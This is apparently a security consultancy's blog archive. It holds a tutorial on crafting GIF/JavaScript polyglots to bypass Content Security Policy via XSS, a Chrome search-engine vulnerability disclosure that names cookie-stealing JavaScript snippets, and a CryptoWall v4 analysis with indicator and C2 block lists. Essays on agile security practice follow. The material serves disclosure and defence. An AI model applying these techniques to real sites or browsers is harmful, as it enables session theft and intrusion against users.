[email protected]   +1 (833) 3COLONY / +61 1300 733 940

Category Archives: Uncategorized

Malicious Memes


The content of this article was also presented by Sam at the 2016 Unrest Conference.

In the past, allowing clients to upload images to your web application was risky business. Nowadays, profile pictures and cat images are everywhere on the Internet and robust procedures exist for handling image uploads, so we can rest assured they protect us from the nasties. Or can we?

Background

Image polyglots are one way to leverage vulnerabilities in web applications and execute malicious scripts in a victim’s web browser. They have the added bonus of bypassing certain security controls designed to mitigate these script injection attacks. This blog will explain how to build an image polyglot and demonstrate how using one can bypass a server’s Content Security Policy (CSP).

Content Security Policy (CSP)

The CSP is set by the web server in the form of a header and informs the user’s browser to only load and execute objects that originate from a certain set of whitelisted places. For example, a common implementation of the CSP header is to ensure the browser only accepts scripts that come from your domain and block the use of inline scripts (i.e., scripts blended directly with other client-side code such as HTML). This CSP is a recommended security header to mitigate the damage caused by Cross-Site Scripting vulnerabilities. The header achieves this by narrowing the attack surface available for malicious scripts to be loaded from. HTML5 Rocks has a great introduction to Content Security Policy if you would like to learn more.

Cross-Site Scripting (XSS)

XSS attacks are a type of web application injection exploit in which an attacker is able to embed their own client side code into a web application and have it rendered in the browser as a part of the webpage. Usually caused by lack of (or poorly implemented) user input sanitation and encoding, attackers use XSS vulnerabilities to inject malicious JavaScript (JS) that can be used to hijack user’s sessions, modify content on the webpage, redirect the visitor to another website or ‘hook’ the victim’s browser. Browser hooking is an attack technique for leveraging XSS vulnerabilities in which the XSS is used to load scripts from a server operated by the attacker which grants greater control over the hooked browser’s behaviour.

XSS is one of the most common web application vulnerabilities and many major websites — including Google, PayPal, eBay, Facebook and the Australian Government’s My Gov site — have been found to have XSS vulnerabilities at some point in time. Reflected XSS is a type of attack in which the injection is reflected back to the victim, rather than being stored on the web server. They are usually executed when a victim is coerced into clicking a link containing the malicious payload. The malicious script is considered to be ‘inline’ with the web application as it is loaded alongside other client side code like Hyper Text Markup Language (HTML) and not from a dedicated JS file. CSP can be configured to deny inline scripts from being executed in the browser which in theory mitigates the dangers of a reflected XSS and protects the user.

CSP in action — and how to get around it

Take for example a web application that allows you to upload and view images and has an aggressive CSP that only permits loading scripts from the application’s domain while denying the use of inline scripts. You’ve found a great reflected XSS vulnerability; however, your payload doesn’t execute because it’s inline and blocked by the CSP. You attempt to upload your payload through the image upload but the web application rejects it for not being a valid image. An image polyglot can help you get around those pesky security controls.

Polyglots

In humans, a ‘polyglot’ is someone who can speaks several languages. In the computer world it means code that is valid in several programming languages.

Figure 1 — Valid ‘C’ programming code

Figure 2 — Valid ‘Perl’ programming code

The code snippets in Figure 1 and Figure 2 are identical and yet also cross-compatible. This is polyglot code and is the underlying mechanism for the attack detailed in this tech blog.

GIF Images

You have more than likely heard of the Graphics Interchange Format (GIF) image type which has the file extension ‘.gif’. The popular image type was invented in 1987 by Steve Wilhite and updated in 1989. It has since come into widespread use on the Internet largely due to its support for animation.

Figure 3 — An animated GIF image

GIF images only support a 256 colour palette for each frame, which is why GIF images often look poor in quality. Each frame of an animated GIF is stored in its entirety making the format inefficient for displaying detailed clips of any longer than a few seconds (incidentally, while the pronunciation is often disputed, I can confirm for you right now it’s pronounced ‘jiff’ after an American brand of peanut butter — no joke).

Figure 4 — The constructs of a GIF image sourced from: http://www.matthewflickinger.com/lab/whatsinagif/bits_and_bytes.asp

The attack this blog will demonstrate only requires knowledge of the ‘Header’, ‘Trailer’ and ‘Logical Screen Descriptor’ (LSD). The data in between these represent each frame of a GIF image. At least one frame is expected in a valid GIF. All GIF images begin with the signature ‘GIF’ followed by the version represented as ‘87a’ or ‘89a’ in the header.

Figure 5 — The header of a GIF version 89 image in hexadecimal and corresponding human readable ASCII encoded output

The following seven bytes of a GIF image make up the LSD which informs the image decoder of properties that effect the whole image. Firstly, the canvas width and height values which are stored as unsigned 16-bit integers. A ’16-bit unsigned integer’ is a number between 0 and 65,535 that cannot be negative (It wouldn’t make much sense to have a negative canvas size!).

Figure 6 — The LSD of a GIF image sourced from http://www.matthewflickinger.com/lab/whatsinagif/bits_and_bytes.asp

It is also important to understand that this data in the GIF format is represented in ‘little-endian’ which means the least significant byte is read first by the decoder. In Figure 6 we can see the canvas size is set as width: ‘0A00’ and height: ‘0A00’. While seemingly backwards for humans, little-endian dictates the decoder read the smaller byte first, width: ‘000A’ and height: ‘000A’ which is 10 by 10 pixels. Lastly, the trailer (sometimes referred to as the footer) of the image is represented by hexadecimal ‘3B’ which when encoded as ASCII represents a semicolon.

Figure 7 — The hexadecimal and ASCII encoded output showing the footer of a GIF image

Most image decoders, including browsers, will ignore anything after the trailing semicolon making it a good place to put the bulk of our JS payload. However, if the web application manipulates the image; data after the semicolon will likely be discarded. Hence, it’s important that we can still access the raw/unedited image after it’s uploaded to the server — see the ‘limitations’ section of this blog for more information.

Creating the GIF/JS Polyglot

Figure 8 — Our ‘soon to be JS’ GIF sourced from http://www.matthewflickinger.com/lab/whatsinagif/bits_and_bytes.asp

To create our malicious image, we are using a small, non-animated GIF image as seen in Figure 7. Its ASCII encoded output is represented below:

Figure 9 — ASCII encoded output of GIF image data

One method of creating GIF/JS polyglots is by manipulating the LSD to begin a JS comment block as seen in Figure 9. After the GIF trailer we close the comment block and include our payload.

Figure 10 — GIF image with JS payload appended

You will notice that in order to implement the ‘/*’ (begin comment block) JS command we have changed the value of the first two bytes of the LSD which correspond to the canvas width. The hexadecimal value of ‘/*’ is ‘2F 2A’ which when interpreted as little-endian by the image decoder is ‘2A 2F = 10799’. While we still have a valid GIF image, it has a pretty whacky canvas size as seen in the output below:

Figure 11 — EXIFtools output of GIF/JS polyglot image showing a canvas size of 10799x10px

However, other than being oddly sized, the image is still perfectly valid and the image decoder will read the rest of the image data normally, disregarding our JS code after the image trailer.

Figure 12 — The GIF/JS polyglot as interpreted by a JS engine

When we try and execute the image as JS the engine reads the GIF header as a variable name, it ignores the comment block and then continues by setting the variable to equal ‘1’ which is just a dummy variable to ensure the JS syntax remains valid. Then our payload is executed.

The image passes standard image validation techniques used by web applications which often rely on confirming the ‘magic numbers’ (a fancier way of saying header) of the image. Once our image is uploaded to the server we effectively have a valid JS file originating from the web application’s domain which falls within the context of the CSP.

As it stands the image is loaded into to the web application through the use of the HTML ‘img’ tag which informs the browser to interpret the data stream as image data. In order to circumvent this and trigger our JS code, we leverage our XSS vulnerability to load the image with the HTML ‘script src’ tag.

Figure 13 — Leveraging the reflected XSS to execute our polyglot

Figure 14 — XSS payload executing in browser bypassing CSP

Why GIFs?

The convenient design structure of the GIF file format allows us to leverage the image header and manipulate the canvas sizes defined in the LSD without destroying the properties of the image for the image decoder.

Limitations

  • Web applications that restrict image uploads to a certain canvas size can hinder the effectiveness of an image polyglot. Due to the limited number of JS characters that can be used in the LSD the canvas sizes are often unusually large and cannot conform to strict image upload pixel rules.
  • Server side image manipulation that resizes the image will edit the canvas size in the LSD; corrupting our polyglot. If it’s not possible to locate the original unedited image through the web application, then the image will not execute as JS.

Conclusion

While Figure 14 demos a rather mundane script execution it confirms we now have a method of uploading and executing an XSS attack regardless of the CSP directive. The stored JS in our image acts as an uploaded script file satisfying the CSP same origin requirements.

This attack proves that CSP isn’t a catch-all XSS filter and can be circumvented in some cases. In application penetration testing GIF/XSS polyglots are a powerful tool to leverage the consequence of improper output sanitation.

While still recommended, the CSP header should be implemented with the understanding that it’s the last line of defence against XSS attacks that might protect your web app. Ultimately, secure development processes and proper output encoding are the best way to protect web applications against XSS.


Article by Sam Reid, Security Specialist, Hivint

Google Chrome — Default Search Engine Vulnerability


Introduction

In December 2015, Hivint’s Technical Security Specialist — Taran Dhillon — discovered a vulnerability in Google Chrome and the Chromium browser that allows an attacker to intercept sensitive information, authentication data and personal information from a target user.

This issue has been reported to the Google/Chromium team but as of July 2016 has not been rectified.

The vulnerability in the Chrome browser is due to the “Default Search Engine” functionality not restricting user input and allowing JavaScript code to be inserted and executed. The Default Search Engine functionality allows users to save and configure preferred search engines. When a user performs a search from the web browser by entering the search text directly into the URL bar, the web browser uses the default search settings configured earlier to perform this search.


Chrome Default search settings — with the Google search engine configured as the default search engine

To prevent unintended and unauthorised actions from users, data provided by users should be sanitised and/or restricted to prevent malicious data from being entered. The malicious data consists of malicious code supplied to the browser as Javascript. Input sanitation involves checking the text/characters a user enters and ensuring they do not contain any malicious code.

Combined with the fact that Google Chrome is the most popular web-browser with approx. 71.4% of all internet users, this vulnerability presents a significant security risk.

What is JavaScript and how can it be exploited maliciously?

JavaScript is one of the core programming languages used for web applications and its main function is in modifying the behaviour of web pages. It is extremely flexible and is often used to dynamically change the content on websites to provide a rich user experience.

Although JavaScript is normally used to improve a user’s web experience, it can also be used in malicious ways which include stealing personal information and sensitive data from target users.

Examples of JavaScript that can be used for malicious purposes using the vulnerability discussed in this article are:

  • escape(document.cookie); – Which can be used to steal a user’s browser cookies. Browser cookies contain information about the current user and may include: authentication information (which is generated when a user logs into a website to uniquely identify the user’s session), the contents of a user’s shopping cart (on an e-commerce site) and tracking information (used to track a user’s web-browsing habits, geographic location and source IP address).
  • escape(navigator.userAgent); – Used to display a target user’s web-browser type.
  • escape(document.baseURI); – Contains the URL of the website the user is currently browsing.

The examples above are only a small sample of JavaScript that can be used for malicious purposes with the vulnerability identified in this article.

How to check if you’re vulnerable

To check if your web-browser (Google Chrome / Chromium) is vulnerable, perform the following steps:

  1. Navigate to SettingsManage Search Engines.
  2. Scroll to the bottom of the Other Search Engines table.
  3. Click in the box marked Add a new search engine and enter any text, e.g. poison.
  4. Click in the box marked Keyword and enter any text, e.g. poison.
  5. Click in the box marked URL with %s in place of query and paste in the following text: javascript:window.location=alert(1);
  6. If the colour of the text-box turns from red to white, this indicates your browser is vulnerable.


Exploit Example

Replacing the Chrome “master_preferences” file (a file which is used by Chrome to set all of its default settings) is a method an attacker can use to deliver the exploit to a victim machine.

The code below creates a malicious “master_preferences” file which redirects all searches performed by the victim user to the attacker’s web-server (where the attacker receives the victim’s browser cookies, current browser URL and browser software information) and then sends the victim back to their original Google search.

This results in a seamless compromise of the victim user’s web browser that is extremely difficult for them to detect:


Video Demo

This video demonstrates how the vulnerability can be exploited:

  1. The user is tricked into loading malicious software.
  2. The malicious software containing the exploit is executed on the victim’s machine when the user opens the Chrome browser and searches ‘pwned’ in their browser
  3. Information is transmitted and intercepted by the attacker and the victim is then unknowingly redirected back to their search with the attack remaining undetected

How can I prevent myself from being exploited?

Currently, the only effective mitigation is to uninstall and not use Google Chrome or Chromium. Additionally, do not click on untrusted links on websites or open attachments or links in emails that are unexpected, from untrusted sources or which otherwise seem suspicious.


Article by Taran Dhillon, Security Specialist, Hivint

CryptoWall — Analysis and Behaviours


Key Behaviours of CryptoWall v4

This document details some initial research undertaken by Hivint into the newly released CryptoWall version 4 series of ransomware. A number of organisations we have worked with have experienced infections by CryptoWall and its variants, in some cases leading to severe consequences.

This research paper outlines more information about the latest version of CryptoWall, as well as providing guidance on possible methods for creating custom security controls within your IT environment to mitigate the threat of CryptoWall infections, as well as how to detect and respond to these infections if they do occur. Some lists of known payload sources, e-mail domains and payment pages associated with CryptoWall are also provided at the end of this paper for use in firewall rulesets and/or intrusion detection systems.

CryptoWall version exhibits the following new behaviours:

  • It now encrypts not only the data in your files, but the file names as well;
  • It still includes malware dropper mechanisms to avoid anti-virus detection — but this new version also possesses vastly improved communication capabilities. It still uses TOR, which it may be possible to block with packet-inspection functions on some firewalls. However, it has a modified version of the protocol that attempts to avoid being detected by 2nd generation enterprise firewall solutions.
  • It appears to inject itself into or migrate to svchost.exe and iexplore.exe. It also calls bcdedit.exe to disable the start-up restore feature of Windows. This means the system restore functions that were able to recover data in previous versions of the ransomware no longer work.

Infection Detection

Antivirus detection for this variant is generally very low, but there’s some work on detection taking place. ESET’s anti-virus solution, for example, detects the .js files used by CryptoWall in emails as JS/TrojanDownloader.Agent;

The most reliable method to detect Cryptowall v4 infections when creating rules in intrusion detection systems, firewalls, antivirus systems, or centralised log management servers is to create a rule to alert on creation of the following filenames, which are static within CryptoWall v4:

  • HELP_YOUR_FILES.TXT
  • HELP_YOUR_FILES.HTML
  • HELP_YOUR_FILES.PNG

It’s also worth noting that having in place a comprehensive, regular and consistent backup process for key organisational data is extremely important to combat the threat posed by ransomware such as CryptoWall v4. This will facilitate the prompt restoration of important files, limiting impacts of productivity.

Limiting the risk of Infection

CryptoWall v4 connects to a series of compromised web pages to download the payload. Some of the domain names hosting compromised pages are listed below — a useful step would be to create a regular expression on firewalls and other systems to block access to these domains:

  • pastimefoods.com
  • 19bee88.com
  • adrive62.com
  • httthanglong.com

Note that the list of compromised web pages is constantly evolving and so the implemented regular expression will require ongoing maintenance within corporate networks. See the lists at the end for more domains.
 
In the new version of CryptoWall, infected files have their file names appended with pseudorandom strings. As a result, filename encryption is harder to identify through pure examination of file extension names, unlike past versions of CryptoWall (in which ‘.encrypted’ was appended to the end of encrypted files). Thus, implementing an alert or blocking mechanism becomes more challenging.
 
However, it is possible to implement regular expression-based rules by considering the executable file names which are downloaded as part of an attempt to infect a system with CryptoWallv4. These are two known to be associated with CryptoWall v4 infections:

It may also be possible to write detection rules to find a static registry key indicating the presence of a CryptoWall infection. This can then be used to search over an entire corporate domain to locate infected machines, or possibly used in anti-virus / IDS signatures. An example is:

  • HKEY_USERSSoftwareMicrosoftWindowsCurrentVersionRun a6c784cb “C:UsersadminAppDataRoaminga6c784cb4ae38306a6.exe

Another step to consider is writing a custom list for corporate firewalls containing the domains that phishing e-mails associated with CryptoWall v4 infections are known to come from, as well as a list of known command-and-control servers. For example, one of the first e-mail domains to be reported was 163.com. In addition, some of the known command and control hosts that the ransomware makes calls to include:

  • mabawamathare.org
  • 184.168.47.225
  • 198.20.114.210
  • 143.95.248.187
  • 64.247.179.218
  • 52.91.146.127
  • 103.21.59.9

CryptoWall v4 also makes use of Google’s 8.8.8.8 service for DNS — this behaviour can be taken into account as part of determining whether there are additional security controls that can be implemented to mitigate the risk of infection. In addition, it appears that CryptoWall v4 makes outgoing calls to the following URLs (among others). These may also be useful in developing infection detection controls:

The initial controls we have worked with most customers to implement on their corporate networks included adding a rule to anti-virus detection systems to identify the ransom note file when it is created (i.e.: HELP_MY_FILES.txt). This enables network administrators to be promptly alerted to infections on the network. This is a valuable strategy in conjunction with maintaining lists of known bad domains related to the malware’s infection sources and infrastructure.

Lists of known payload sources, e-mail domains and payment pages associated with CryptoWall

We’ve included the following lists of payload sources, domains and pages associated with Cryptowall v4 infections — which some of our clients have used — to identify activity potentially associated with the ransomware. These can be used in addition to blacklists created and maintained by firewall and IDS vendors:

  • Decrypt Service contains a small list of the IP addresses for the decryption service. This is the page victims are directed to in order to pay the authors of Cryptowall for the decryption keys. These servers are located on the TOR Network but use servers on the regular web as proxies.
  • Email Origin IPs — contains IP addresses of known sources of CryptoWall v4 phishing e-mail origin servers — can be used in developing black lists on e-mail gateways and filtering services.
  • Outgoing DNS Requests — contains a list of IP addresses that CryptoWall v4 attempts to contact.
  • Payload Hosts — contains known sources of infection — including compromised web pages and other infection sources.

CryptoWall associated IP addresses

Article by John McColl, Principal Advisor, Hivint

Secure Coding in an Agile World: If The Slipper Fits, Wear It


Combining agile software development concepts in an increasingly cyber-security conscious world is a challenging hurdle for many organisations. We initially touched upon this in a previous article — An Elephant in Ballet Slippers? Bringing Agility To Cyber Security — in which Hivint discussed the need to embrace agile concepts in cyber security through informal peer-to-peer sharing of knowledge with development and operations teams and the importance of creating a culture of security within the organisation.

One of the most common and possibly biggest challenges when incorporating agility into security is the ability to effectively integrate security practices such as the use of Static Application Security Testing (SAST) tools in an agile development environment. The ongoing and rapid evolution of technology has served as a catalyst for some fast-paced organisations — wishing to stay ahead of the game — to deploy software releases on a daily basis. A by-product of this approach has been the introduction of agile development processes that have little room for security.

Ideally, security reviews should happen as often as possible prior to final software deployment and release, including prior to the transition from the development to staging environment, during the quality assurance process and finally prior to live release into production. However, these reviews will often require the reworking of source code to remediate security issues that have been identified. This obviously results in time imposts, which is often seen as a ‘blocker’ to the deployment pipeline. Yet the increase in media coverage of security issues in recent years highlights the importance of organisations doing all that they can to mitigate the risks of insecure software releases. This presents a significant conundrum: how do we maintain agility and stay ahead of the game, but still incorporate security into the development process?

One way of achieving this is through the use of a ‘hybrid’ approach that ensures any new software libraries, platforms or components being introduced into an organisation are thoroughly tested for security issues prior to release into the ‘agile’ development environment. This includes internal and external frameworks such as the reuse of internally created libraries or externally purchased software packages. Testing of any new software code introduced into an IT environment — whether externally sourced or internally produced — is typically contemplated as part of a traditional information security management system (ISMS) that many organisations have in place. Once that initial testing has taken place and appropriate remediation occurs for any identified security issues, the relevant software components are released into the agile environment and are able to be used by developers to build applications without the need for any further extensive testing. For example, consider a .NET platform that implements a cryptographic function using a framework such as Bouncy Castle. Both the platform and framework are tested for security issues using various types of testing methodologies such as vulnerability assessments and penetration tests. The developers are then allowed to use them within the agile development environment for the purposes of building their applications.

When a new feature or software library / platform is required (or a major version upgrade to an existing software library / platform occurs), an evaluation will need to occur in conjunction with the organisation’s security team to determine the extent of the changes and the risks this will introduce to the organisation. If the changes / additions are deemed significant, then the testing and assurance processes contemplated by the overarching ISMS will need to be followed prior to their introduction into the agile development environment.

This hybrid approach provides the flexibility that’s required by many organisations seeking an agile approach to software development, while still ensuring there is an overarching security testing and assurance process that is in place. This approach facilitates fast-paced development cycles (organisations can perform daily or even hourly code releases without having to go through various types of security reviews and testing), yet still enables the deployment of software that uses secure coding principles.

It may be that fitting the ballet slippers (agility) onto the elephant (security) is not as an improbable concept as it once seemed.


Article by Craig Searle, Chief Apiarist, Hivint

The Cyber Security Ecosystem: Collaborate or Collaborate. It’s your choice.


As cyber security as a field has grown in scope and influence, it has effectively become an ‘ecosystem’ of multiple players, all of whom either participate in or influence the way the field develops and/or operates. At Hivint, we believe it is crucial for those players to collaborate and work together to enhance the security posture of communities, nations and the globe, and that security consultants have an important role to play in facilitating this goal.

The eco-system untwined

The cyber security ecosystem can broadly be divided into two categories, with some players (e.g. governments) having roles in both categories:

Macro-level players

Consists of those stakeholders who are in a position to exert influence on the way the cyber security field looks and operates at the micro-level. Key examples include governments, regulators, policymakers and standards setting organisations and bodies (such as the International Organization for Standardization, Internet Engineering Task Force and National Institute for Standards and Technology).

Micro-level players

Consists of those stakeholders who, both collectively and individually, undertake actions on a day-to-day basis that affect the community’s overall cyber security posture (positively or negatively). Examples include end users/consumers, governments, online businesses, corporations, SMEs, financial institutions and security consultants (although as we’ll discuss later, the security consultant has a unique role that bridges across the other players at the micro-level).

The macro level has, in the past, been somewhat muted with its involvement in influencing developments in cyber security. Governments and regulators, for example, often operated at the fringes of cyber security and primarily left things to the micro-level. While collaboration occurred in some instances (for example, in response to cyber security incidents with national security implications), that was by no means expected.


The formalisation of collaborative security

This is rapidly changing. We are now regularly seeing more formalised models being (or planning to be) introduced to either strongly encourage or require collaboration on cyber security issues between multiple parties in the ecosystem.

Recent prominent examples include proposed draft legislation in Australia that would, if implemented, require nominated telecommunications service providers and network operators to notify government security agencies of network changes that could affect the ability of those networks to be protected[1], proposals for introducing legislative frameworks to encourage cyber security information sharing between the private sector and government in the United States[2], and the introduction of a formal requirement in the European Union for companies in certain sectors to report major security incidents to national authorities[3].

There are any number of reasons for this change, although the increasing public visibility given to cyber security incidents is likely at the top of the list (in October alone we have seen two of Australia’s major retailers suffer security breaches). In addition, there is a growing predilection toward collaborative models of governance in a range of cyber topic areas that have an international dimension (for example, the internet community is currently involved in deep discussions around transitioning the governance model for the internet’s DNS functions away from US government control towards a multi-stakeholder model). With cyber security issues frequently having a trans-national element — particularly discussions around setting ‘norms’ of conduct around cyber security at an international level[4] — it’s likely that players at the macro-level see this as an appropriate time to become more involved in influencing developments in the field at the national level.

Given this trend, it’s unlikely to be long before the macro-level players start to require compliance with minimum standards of security at the micro-level. As an example, the proposed Australian legislation referred to above would require network operators and service providers to do their best (by taking all reasonable steps) to protect their networks from unauthorised access or interference. And in the United States, a Federal Court of Appeals recently decided that their national consumer protection authority, the Federal Trade Commission, had jurisdiction to determine what might constitute an appropriate level of security for businesses in the United States to meet in order to avoid potential liability[5]. In Germany, legislation recently came into effect requiring minimum security requirements to be met by operators of critical infrastructure.

Security consultants — the links in the collaboration chain

Whatever the reasons for the push towards ‘collaborative’ security, it’s the micro-level players who work in the cyber security field day-to-day who will ultimately need to respond as more formal expectations are placed on players at the macro-level with regards to their security posture.

Hivint was in large part established to respond to this trend — we believe that security consultants have a crucial role to play in this process, including through building a system in which the outputs of consulting projects are shared within communities of interest who are facing common security challenges, thereby minimising redundant expenditure on security issues that other organisations have already faced. This system is called “The Security Colony” and is available now[6]. For more information on the reasons for its creation and what we hope to achieve, see our previous article on this topic.

We also believe there is a positive linkage between facilitating more collaboration between players at the micro-level of the ecosystem, and encouraging the creation of more proactive security cultures within organisations. Enabling businesses to minimise expenditure on security problems that have already been considered in other consulting projects enables them to focus their energies on implementing measures to encourage more proactive security — for example, as we discussed in a previous article, by educating employees on the importance of identifying and reporting basic security risks (such as the inappropriate sharing of system passwords). And encouraging a more proactive security culture within organisations will ultimately strengthen the nation’s overall cyber security posture and benefit the community as a whole.


Article by Craig Searle, Chief Apiarist, Hivint


[1] See in particular the proposed changes to section 313 of the Telecommunications Act 1997 (Cth).
[2] See https://www.fas.org/sgp/crs/misc/R44069.pdf for a description of these proposals.
[3] See http://ec.europa.eu/digital-agenda/en/news/network-and-information-security-nis-directive
[4] See for example http://www.project-syndicate.org/commentary/international-norms-cyberspace-by-joseph-s–nye-2015-05
[5] See http://www.technologylawdispatch.com/2015/08/privacy-data-protection/third-circuit-upholds-ftcs-authority-in-wyndham-case/?utm_source=Mondaq&utm_medium=syndication&utm_campaign=View-Original
[6] https://www.securitycolony.com/

An Elephant in Ballet Slippers? Bringing Agility To Cyber Security


As enterprise IT and development teams embrace Agile concepts more and more, we are seeing an increased need for cyber security teams to be similarly agile and able to adapt to rapidly evolving environments. Cyber security teams that will not or cannot make the necessary changes will eventually find themselves irrelevant; too far removed from the function and flow of the organisation to provide meaningful value, resulting in an increased risk for the organisation and its interests.

So, how do we fit the elephant (cyber security) with ballet slippers (agility)?

Firstly, in an age of devops, continuous integration and continuous deployment it is critical to understand the evolving role of the cyber security team. The team’s focus on the on rigorous definition, enforcement and assurance of security controls is giving way to active education, collaboration and continual improvement within non-traditional security functions. This is primarily because the developers, the operations team, the sysadmins have all become the front-line for the security team. These teams spend their working life making decisions that will impact the security of the product & platforms and ultimately the security of the enterprise. Rather than risk being seen as the ‘department of no’ the cyber security team needs to embrace the change that agile development brings and find ways to improve the enterprise through enhancing the skills and capabilities of these teams.

First and foremost is education. If the devops team don’t know or even worse, don’t value security controls and secure practices then the systems they develop and maintain will never be secure. It is the role of the cyber security team to ensure that all members of the development and operations team understand that security doesn’t need to be difficult, it can be implemented well if it is inherent to the development process. This is typically achieved through ongoing training and education, both formally and informally.

Secure development and devops training courses are widely available and are absolutely a valuable part of the toolkit, but they tend to be rather static in nature and often bad habits tend to creep back in over time. Informal education through peer review, feedback and information sharing is far more consistent and reliable as long as there is a clear security ethos that can be established for the team to work from. This is particularly the case for the senior members of the team passing on their knowledge to newer or less experienced members.

Security champions are crucial in filling this role. Ideally a security champion is a member of the security team that works with the development team on a daily, even hourly, basis. One of the most important parts of this role is that the security champion needs to be able to ‘speak geek’ and understand the challenges facing the team when trying to rapidly develop applications. A background in development or devops means that they can speak from experience and be empathetic when dealing with the development teams. The security advice they provide needs to be pragmatic, weighing up the relative risks and benefits, and it needs to be delivered in a way that is meaningful to the rest of the development team.

An ability to get their ‘hands dirty’ and actually assist in aspects of code development or systems maintenance is definitely a bonus. The security champion also needs to drive the implementation of tools and services to support the rapid identification, assessment and remediation of security vulnerabilities in code or platforms. Wherever possible these security tools need to be seamlessly built into the existing development, deployment and testing tools (think Bamboo, Jira, Jenkins, Circle CI and Selenium) so that security assessment becomes transparent to the overall development and deployment processes. The security champion should also responsible for bringing a cyber-security context into the design stages of development. This is often best achieved by flagging stories (Agile-speak for detailed use-cases) as ‘secure’, meaning that particular attention needs to be paid to that component — user input, authentication, database calls, connections to external systems/APIs will all require additional analysis.

Finally, and possibly most importantly, it is critical that organisations develop a culture of security. Insecure practices must be considered as a real no-no in the day to day business behaviours. A good comparison is the nature of OH&S (Occupational Health & Safety) practices in the workplace today. 15–20 years ago your typical workplace was not as safe as they are now. Instances like trip hazards, puddles of liquid and the like weren’t necessarily seen a big issue.

Nowadays staff recognise them as a safety risk and have been trained to respond accordingly or raise the issue with someone who will. Cyber security needs to arrive at the same point. Staff need to be aware of what constitutes ‘safe’ and ‘unsafe’ cyber security behaviours, and feel confident in calling out unsafe practices.

Observing a team member sharing a password or leaving a workstation unlocked, shouldn’t be something that is seen as normal practice — it needs to be identified as a risk and addressed immediately, with the security team being part of the solution to the problem. Pointing out an insecure practice but not providing a practical solution will only alienate the security team. As staff become aware and feel confident in calling out unsafe activities, with the support of the security team to address, the it becomes part of the cultural DNA and is more readily passed on to new team members and new initiatives.

Agile development does present a number of challenges to a cyber-security team. Trying to adhere to the same practices and controls that were implemented 5–10 years ago is ultimately destined for failure as the rate of change is too rapid in order for them to be effective. Adapting practices to maintain relevancy to the evolving environment is the only way to remain effective and best protect the organisation and its customers.


Article by Craig Searle, Chief Apiarist, Hivint

Maturing Organisational Security and Security Service Catalogues


One of the key objectives for an information security professional is providing assurance that the systems which are implemented, or are soon to be implemented, are secure. A large part of this involves engaging with business and project teams proactively to ensure that security needs are met, while trying hard not to interfere with on-time project delivery.

Unfortunately, we’re not very good at it.

Recently, having agreed to conduct a security risk assessment (SRA) of a client’s SFTP solution, which they intended to use to transfer files to a vendor in place of their existing process of emailing the files, I sat down to discuss the security requirement with the Solution Designer, only to have him tell me that an SRA had been done before. Not just on the same design pattern, but on the exact same SFTP solution. They were simply adding an additional existing vendor to the solution to improve the security of their inter-company file transfer process. The organisation didn’t know how to go about evaluating the risks to the company of this change, so they used the ‘best fit’ security-related process available to it, which just happened to be an SRA.

Granted, in the example above, a new vendor might need to be assessed for the operational risk associated with them uploading files to our client’s environment, or if there were changes to the SFTP solution configuration. But in this case, the vendor had been working with them for some time so there was no further risk introduced, just a more secure business process: the risk was getting lower not higher.

While this is only one example, this scenario is not uncommon across many organisations we work with, across many industry sectors, and it’s only going to get harder. With more organisations moving to an agile development methodology and cloud deployments, ensuring security keeps up with new developments throughout the business is going to be critical to maintaining at least a modicum of security in these businesses.

So, if you’re getting asked to perform a risk assessment the day before go-live (yes, this still happens), you’re doing it wrong.

If you’re routinely performing your assessments of systems and technology within the project lifecycle, you’re doing it wrong.

If you’re engaging with your project teams with policy statements and standards documents, yes, unfortunately you’re also doing it wrong.

Projects are where things — often big things — change in an organisation’s business or technology environment. And where there is change, there is generally a key touch point for the security team. Projects will generally introduce the biggest potential vulnerabilities to your environment, but if there is an opportunity to positively influence the security outcomes at your organisation, it will also be as part of a project.

Once a system is in, it’s too late. If you haven’t already given your input to get a reasonably secure system, the project team will have moved on, their budget will have gone with them, and you’ll be left filling out that risk assessment that sits on some executive’s desk waiting for the risk to be accepted. Tick.

But on the flip-side, if you’re not proactively engaging with project teams and your business to provide solutions for them, you’re getting in the way.

Let’s face it, no project manager wants to read through dozens of pages of security policy and discern the requirements for their project — you may as well have told them through interpretive dance.

So, what’s the solution?

The solution is to look to the mature field of IT Service Management, and the concept of having a Service Catalogue.

A Security Services Catalogue is two things:

Firstly, it is a list of the security and assurance activities which the security team offers which are generally party of the system development lifecycle. These services may include a risk assessment, vulnerability assessment and penetration testing, and code review, among others. The important thing being that the services are well defined in terms of the offering inputs, outputs and process, and the required effort and price, so that the business and the project teams can effectively incorporate it into their budget and schedule.

Secondly, it is a list of the security services already implemented within the organisation and operated by or on behalf of the security team, which have been through your assurance processes and are effectively “approved for use” throughout the organisation. These services would be the implementation of a secure design pattern or blueprint, or form part of one of those blueprints. To get an idea, have a look at the OSA Security Architecture Landscape, or the Mozilla Service Catalog.

Referring quickly to Mozilla’s approach, a good example is their logging or monitoring or SIEM service. Assuming a regulatory and policy requirement for logging and monitoring for all systems throughout your environment, it allows the project team to save money and time by using the standardised service. Of course, using the already implemented tool is also common sense, but writing it down in a catalogue ensures that the security services on offer are communicated to the business, and that the logging and monitoring function for your new system is a known-quantity and effective.

The easiest way to describe this approach is “control inheritance” — where a particular implementation of a control is used by a system, that system inherits the characteristics of that control. Think of Active Directory — an access control mechanism. Once you’ve implemented and configured it securely, and it has been evaluated, you have a level of assurance that the control is effective. For all systems then using Active Directory, you have a reasonable level of assurance that they are access controlled, and you can spend your time evaluating other security aspects of the system. So communicate to your organisation that they can use it via your Security Service Catalogue.

And if your Project team wants to get creative? No problem, but anything not in the catalogue needs to go through your full assurance process. That — quite rightly — means risk assessments, control audits, code reviews, penetration tests, and vulnerability scans, which accurately reflects the fact that everything will be much easier for everyone if they pick from the catalogue where possible.

So, how does this work in practice?

Well, firstly, start by defining what level of assurance you need for a system to go into production, or to meet compliance. For example, should you need to meet PCI compliance, you’ll at least have to get your system vulnerability scanned and penetration tested. Create your service catalogue around these, and defining business rules for their use and the system development lifecycle stages in which they must be completed.

Secondly, you need to break down your environment into its constituent parts (specifically the security components), review and approve each of those parts, and add them to your Security Service Catalogue. Any system then using those security services as part of its functionality, inherits the security of those services, and you can have a degree of assurance that the system will be secure (at least to the degree that the system is solely comprised of approved components).

The benefits are fourfold:
Project teams can simply select the services they want to integrate with, and know that those services meet the requirements of the security policy. No mess, no fuss.
Projects go faster, project teams know what the expectations are for them, and aren’t held up by the security inquisitor demanding their resources’ time.
Budget predictability. Project teams know the costs which need to be included in their budget up front. They can also choose a security service which is a known-quantity, which means there is a lower chance of a risk eventuating that needs them to pay to change aspects of the system to meet compliance or remediate a vulnerability.

